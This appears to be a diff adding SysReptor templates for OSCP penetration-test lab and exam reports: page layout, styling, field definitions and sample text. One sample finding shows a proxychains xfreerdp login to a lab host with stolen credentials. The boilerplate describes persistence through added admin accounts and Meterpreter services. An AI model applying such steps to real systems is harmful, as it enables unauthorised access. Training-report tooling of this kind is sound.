<td align="center" :class="'risk-bg-' + finding.cvss.level">
<ref :to="finding.id">{{ finding.cvss.score }}</ref>
</td>
<td align="center">
<ref :to="finding.id" class="ref-page" />
</td>
</tr>
</tbody>
</table>
</div>
</section>
<pagebreak />
<section>
<h1 id="findings" class="in-toc numbered">Lab Network</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }} ({{ finding.ip_address }})</h2>
<table class="finding-heading">
<tr>
<td class="table-key">Score:</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
{{ finding.cvss.score}} ({{ lodash.capitalize(finding.cvss.level) }})
</td>
</tr>
<tr>
<td class="table-key">Vector:</td>
<td>{{ finding.cvss.vector || 'n/a' }}</td>
</tr>
</table>
<div v-if="finding.initialaccess">
<h3 class="in-toc numbered">Initial Access</h3>
<markdown :text="finding.initialaccess" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation</h3>
<markdown :text="finding.postexploitation" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.exercises.length > 0">
<h1 id="coursexercises" class="in-toc numbered">Course Exercises</h1>
<div v-for="exercise in report.exercises">
<h2 class="in-toc">{{ exercise.caption }}</h2>
<markdown :text="exercise.description" />
</div>
<pagebreak />
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #E83221;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "Penetration Test Report for Internal Lab"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.exercises]
type = "list"
label = "Exercises"
origin = "custom"
required = true
[report_fields.exercises.items]
type = "object"
label = ""
origin = "custom"
[report_fields.exercises.items.properties]
[report_fields.exercises.items.properties.description]
type = "markdown"
label = "Description"
origin = "custom"
default = "TODO Adapt as required"
required = true
[report_fields.exercises.items.properties.caption]
type = "string"
label = "Title"
origin = "custom"
default = "TODO a.b.c.d Exercise (e.g. \"2.4.3.4 - Finding Files in Kali Linux\")"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.objective]
type = "markdown"
label = "Objective"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
TODO Adapt summary as required
"""
required = true
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.lab_network]
type = "markdown"
label = "Lab Network"
origin = "custom"
default = """
Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report, they are for demonstration purposes only.
For more information regarding the Bonus Points requirements, please visit the following URL: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)
TODO Adapt as required
"""
required = true
[report_fields.methodology]
type = "markdown"
label = "Methodologies"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
TODO Adapt as required
"""
required = true
[report_fields.penetration]
type = "markdown"
label = "Penetration"
origin = "custom"
default = """
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems.
TODO Adapt as required
"""
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.serviceenum]
type = "markdown"
label = "Service Enumeration"
origin = "custom"
default = """
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
TODO Adapt as required
"""
required = true
[report_fields.housecleaning]
type = "markdown"
label = "House Cleaning"
origin = "custom"
default = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
TODO Adapt as required
"""
required = true
[report_fields.infogathering]
type = "markdown"
label = "Information Gathering"
origin = "custom"
default = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Lab Network:**
* System-1
* System-2
* etc.
TODO Adapt as required
"""
required = true
[report_fields.maintainaccess]
type = "markdown"
label = "Maintaining Access"
origin = "custom"
default = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
TODO Adapt as required
"""
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO appendix content"
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "high-level_summary"
label = "High-Level Summary"
fields = [
"objective",
"lab_network",
]
[[report_sections]]
id = "methodology"
label = "Methodologies"
fields = [
"methodology",
"infogathering",
"serviceenum",
"penetration",
"maintainaccess",
"housecleaning",
]
[[report_sections]]
id = "coursexercises"
label = "Course Exercises"
fields = [
"exercises",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target Name"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.ip_address]
type = "string"
label = "IP Address"
origin = "custom"
default = "TODO IP Address"
required = true
spellcheck = false
[finding_fields.initialaccess]
type = "markdown"
label = "Initial Access"
origin = "custom"
default = "TODO Describe initial access"
required = true
[finding_fields.postexploitation]
type = "markdown"
label = "Post Exploitation"
origin = "custom"
default = "TODO Describe post exploitation"
required = true
[finding_fields.privilegeescalation]
type = "markdown"
label = "Privilege Escalation"
origin = "custom"
default = "TODO Describe privilege escalation"
required = true
[report_preview_data]
[report_preview_data.report]
title = "Penetration Test Report for Internal Lab"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
methodology = "{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found."
penetration = "The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems."
report_date = "2022-07-29"
serviceenum = "The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed."
housecleaning = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
"""
infogathering = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Lab Network:**
* System-1
* System-2
* etc.
"""
maintainaccess = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
"""
report_version = "1.0"
firstname = "John"
lastname = "Doe"
objective = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
TODO Adapt summary as required
"""
lab_network = """
Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report, they are for demonstration purposes only.
For more information regarding the Bonus Points requirements, please visit the following URL: https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide
TODO Adapt as required
"""
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.report.exercises]]
description = "TODO Adapt as required"
caption = "TODO a.b.c.d Exercise (e.g. \"2.4.3.4 - Finding Files in Kali Linux\")"
[[report_preview_data.report.exercises]]
description = "TODO Adapt as required"
caption = "TODO a.b.c.d Exercise (e.g. \"2.4.3.4 - Finding Files in Kali Linux\")"
[[report_preview_data.findings]]
title = "Poultry"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
id = "25a70e70-515e-4664-b7ab-dffc2f2fe12e"
ip_address = "10.5.5.20"
initialaccess = """
**Steps to reproduce the attack:** with the credentials at hand and a reverse tunnel established, John connected to an RDP session using proxychains accepting the certificate when prompted and entering the retrieved password afterward.
```
proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard
```
"""
postexploitation = "John noticed the presence of the Thunderbird program on the users desktop, and while checking Alexs inbox he found the email from a local administrator Roger."
privilegeescalation = ""
[[assets]]
id = "f10d2665-653b-4242-93af-6da8d7a0838b"
name = "LICENSE"


@ -0,0 +1,923 @@
format = "projecttypes/v1"
id = "de0fcd3c-9548-40e2-8c48-3ab0b4b3c69b"
name = "OSCP Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"ip_address",
"isActiveDirectory",
"cvss",
"serviceenum",
"initialaccess",
"privilegeescalation",
"postexploitation",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSCP Exam Penetration Test Report {.in-toc.numbered}
## Introduction {.in-toc .numbered}
The Offensive Security Lab and Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security course. This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
## Objective {.in-toc.numbered}
The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network. The student is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An ex-ample page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* Overall High-Level Summary and Recommendations (non-technical)
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Any additional items that were not included
</markdown>
<pagebreak />
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown v-if="report.highlevel_summary" :text="report.highlevel_summary" />
<div v-if="report.recommendations">
<h2 id="recommendations" class="in-toc numbered">Recommendations</h2>
<markdown :text="report.recommendations" />
</div>
<div>
<h2 id="finding-summary" class="in-toc numbered">Identified Vulnerabilities</h2>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<table>
<thead>
<tr>
<th>Target Name</th>
<th>IP</th>
<th align="center">CVSS</th>
<th align="center">Page</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings" class="table-row-link">
<td><ref :to="finding.id">{{ finding.title }}</ref></td>
<td><ref :to="finding.id">{{ finding.ip_address }}</ref></td>
<td align="center" :class="'risk-bg-' + finding.cvss.level"><ref :to="finding.id">{{ finding.cvss.score }}</ref></td>
<td align="center"><ref :to="finding.id" class="ref-page" /></td>
</tr>
</tbody>
</table>
</div>
</section>
<pagebreak />
<section>
<h1 class="in-toc numbered">Methodologies</h1>
<markdown :text="report.methodology" />
<h2 class="in-toc numbered">Information Gathering</h2>
<markdown :text="report.infogathering" />
<h2 class="in-toc numbered">Service Enumeration</h2>
<markdown :text="report.serviceenum" />
<h2 class="in-toc numbered">Penetration</h2>
<markdown :text="report.penetration" />
<h2 class="in-toc numbered">Maintaining Access</h2>
<markdown :text="report.maintainaccess" />
<h2 class="in-toc numbered">House Cleaning</h2>
<markdown :text="report.housecleaning" />
</section>
<pagebreak />
<section v-if="findings.some(f => !f.isActiveDirectory)">
<h1 id="findings" class="in-toc numbered">Independent Challenges</h1>
<div v-for="finding in findings.filter(f => !f.isActiveDirectory)">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }} ({{ finding.ip_address }})</h2>
<table class="finding-heading">
<tr>
<td class="table-key">Score:</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
{{ finding.cvss.score}} ({{ lodash.capitalize(finding.cvss.level) }})
</td>
</tr>
<tr>
<td class="table-key">Vector:</td>
<td>{{ finding.cvss.vector || 'n/a' }}</td>
</tr>
</table>
<div v-if="finding.serviceenum">
<h3 class="in-toc numbered">Service Enumeration</h3>
<markdown :text="finding.serviceenum" />
</div>
<div v-if="finding.initialaccess">
<h3 class="in-toc numbered">Initial Access</h3>
<markdown :text="finding.initialaccess" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation</h3>
<markdown :text="finding.postexploitation" />
</div>
<pagebreak />
</div>
</section>
<section v-if="findings.some(f => f.isActiveDirectory)">
<h1 id="findingsad" class="in-toc numbered">Active Directory Set</h1>
<div v-for="finding in findings.filter(f => f.isActiveDirectory)">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }} ({{ finding.ip_address }})</h2>
<table class="finding-heading">
<tr>
<td class="table-key">Score:</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
{{ finding.cvss.score}} ({{ lodash.capitalize(finding.cvss.level) }})
</td>
</tr>
<tr>
<td class="table-key">Vector:</td>
<td>{{ finding.cvss.vector || 'n/a' }}</td>
</tr>
</table>
<div v-if="finding.serviceenum">
<h3 class="in-toc numbered">Service Enumeration</h3>
<markdown :text="finding.serviceenum" />
</div>
<div v-if="finding.initialaccess">
<h3 class="in-toc numbered">Initial Access</h3>
<markdown :text="finding.initialaccess" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation</h3>
<markdown :text="finding.postexploitation" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: #E83221;
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSCP Penetration Test Report"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.methodology]
type = "markdown"
label = "Methodologies"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
TODO Adapt as required
"""
required = true
[report_fields.penetration]
type = "markdown"
label = "Penetration"
origin = "custom"
default = """
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems.
TODO Adapt as required
"""
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.serviceenum]
type = "markdown"
label = "Service Enumeration"
origin = "custom"
default = """
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
TODO Adapt as required
"""
required = true
[report_fields.housecleaning]
type = "markdown"
label = "House Cleaning"
origin = "custom"
default = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
